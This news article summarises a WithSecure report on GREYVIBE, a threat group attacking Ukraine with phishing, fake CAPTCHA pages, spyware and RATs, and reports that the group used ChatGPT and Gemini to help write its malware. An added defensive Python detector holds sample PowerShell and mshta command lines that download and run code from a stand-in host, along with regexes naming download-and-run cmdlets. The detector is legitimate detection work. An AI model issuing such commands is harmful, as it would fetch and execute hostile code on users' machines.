GREYVIBE used AI in multi-vector cyberattacks on Ukraine

WithSecure reports GREYVIBE used AI-assisted tools for spear-phishing, fake CAPTCHA pages and malicious sites against Ukraine and related targets since August 2025.

WithSecure identified a previously undocumented threat cluster called GREYVIBE that targeted Ukraine and Ukraine-related entities from at least August 2025. The firm described the group as Russian-speaking and operating largely in the Russian time zone, with activity aligned to Kremlin interests in the context of the Russo-Ukrainian war.

The campaigns used multiple delivery methods, including spear-phishing emails linking to archives on Google Drive and 4sync, fake CAPTCHA pages that prompted users to run commands, fraudulent Ukrainian adult-club websites that pushed Android spyware, and charity-themed sites that delivered remote access tools. Victims included military, government, civilian and business organizations.

WithSecure mapped several named attack chains. PhantomMail used spear-phishing links to ZIP or RAR archives containing JavaScript loaders and decoy documents. PhantomRelay is a PowerShell-based remote access trojan that profiles hosts and executes PowerShell scripts and Windows commands. PhantomClick relied on ClickFix-style fake CAPTCHA pages to trick users into running commands that initiated PhantomRelay infections.
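
The PhantomClick chain described above relies on the user running a command themselves. One way a defender can surface that pattern in endpoint telemetry is shown below. This is an added example, not code from the WithSecure report and not GREYVIBE tooling; it assumes that ClickFix-style lures result in an interpreter (PowerShell, cmd, mshta and similar) being spawned as a child of the user's shell, explorer.exe, with a command line that fetches and runs remote content, and it runs over constructed JSON-lines process-creation events rather than real telemetry.

```python
"""Flag process-creation telemetry consistent with a ClickFix-style lure.

Added example, not part of the WithSecure report and not GREYVIBE tooling.
Assumption: a fake CAPTCHA page gets the user to run a command themselves,
so the interpreter is a child of the user's shell (explorer.exe, e.g. via
the Run dialog) and the command line pulls and runs remote content.
The events below are constructed samples, not real telemetry.
"""
import json
import ntpath
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "curl.exe", "certutil.exe"}
USER_SHELLS = {"explorer.exe"}   # assumption: user-typed launches parent here

# Each pattern is one indicator; the score is the number of indicators hit.
INDICATORS = [
    ("remote url", re.compile(r"https?://", re.I)),
    ("encoded command", re.compile(r"-(encodedcommand|enc|e)\b", re.I)),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+hidden\b", re.I)),
    ("download-and-run cmdlet",
     re.compile(r"\b(iex|invoke-expression|downloadstring|invoke-webrequest|iwr)\b", re.I)),
    ("no profile", re.compile(r"-(noprofile|nop)\b", re.I)),
]

# Constructed sample events (Sysmon-like field names), one JSON object per line.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -nop -c \"iex (iwr 'http://example.invalid/verify')\"",
     "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c dir",
     "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Build\agent.exe",
     "CommandLine": r"powershell -nop -File C:\build\step.ps1",
     "User": r"CORP\svc_build"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta http://example.invalid/captcha.hta",
     "User": r"CORP\bob"},
])


def classify(event):
    """Return a finding dict for one event, or None if it does not match."""
    image = ntpath.basename(event.get("Image", "")).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    # Only interpreters launched directly by the user's shell are in scope;
    # the same flags under a build agent or scheduler are routine.
    if image not in INTERPRETERS or parent not in USER_SHELLS:
        return None
    cmd = event.get("CommandLine", "")
    matched = [name for name, rx in INDICATORS if rx.search(cmd)]
    if not matched:
        return None
    return {
        "user": event.get("User", "?"),
        "image": image,
        "parent": parent,
        "indicators": matched,
        "score": len(matched),
        "severity": "high" if len(matched) >= 3 else "medium",
        "command_line": cmd,
    }


def scan(jsonl):
    """Run classify over newline-delimited JSON events; skip malformed lines."""
    findings = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = classify(event)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['user']} {f['parent']} -> {f['image']}: "
              f"{', '.join(f['indicators'])}")
```

On the constructed input the PowerShell one-liner and the mshta launch are flagged, the plain `cmd /c dir` is not, and the build agent's `-nop` invocation is ignored because its parent is not the user's shell. The parent-process condition is what keeps this rule quiet in practice; the indicator list is intentionally generic, so tune it against your own baseline before alerting on it.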

PrincessClub hosted fake adult-club sites to deliver the Android spyware FallSpy as well as Windows RATs such as PhantomRelayV1 and LegionRelay; later lure sites added a WebRTC live-call feature to capture audio and video. DroneLink impersonated charitable foundations to distribute WireGuard and LegionRelay. Nebo used a FallSpy sample that mimicked a Russian-language login screen, likely to deceive Ukrainian personnel.

WithSecure found evidence the group used generative AI and large language models, including Ideogram AI, OpenAI ChatGPT and Google Gemini, to generate images and to assist in writing LegionRelay, obfuscation and loader scripts, backend components and post-compromise commands. Researcher Mohammad Kazem Hassan Nejad wrote, “The group has leveraged multiple attack vectors, including spear‑phishing e‑mails, fake captcha pages, and fraudulent Ukrainian adult club websites, to deliver malware to a diverse set of victims.”

Analysts described GREYVIBE as low-to-moderately sophisticated, producing custom components but showing operational security lapses. WithSecure noted AI use sped development and reduced reliance on known tools while also introducing design flaws that exposed parts of LegionRelay’s backend. Nejad added that frequent AI-generated changes could make clustering methods based on stable technical artifacts less reliable over time.

The report identified overlaps with the Russian cybercrime ecosystem. Evidence included: possible use of an ISO builder linked to TrickBot and UAC-0098; reuse of PhantomRelay variants in unrelated criminal activity, such as a Microsoft Teams voice phishing campaign from July 2025 to February 2026 and a KongTuke delivery chain in early 2026; uploads of early development samples to VirusTotal; developer artifact names using internet slang; and a small deployment of the XMRig miner on infected machines.

WithSecure assigned moderate confidence that GREYVIBE has ties to cybercrime networks and low-to-moderate confidence that current or former cybercriminals are involved. The firm said the group may operate in a hybrid mode, with criminal actors absorbed into state tasking, criminal operators working under direction, or an ad hoc team taking on state-aligned assignments.

Technical notes in the report include PhantomRelayV1’s custom watchdog persistence, LegionRelay’s functions for file enumeration, exfiltration, screenshot capture, browser and messaging-app data theft, and tools to set up RDP access. FallSpy was identified as Android spyware capable of harvesting device data. The analysis documents iterative development, frequent refactoring and reuse of tools across campaigns since August 2025.

WithSecure published the full analysis with additional technical indicators and samples.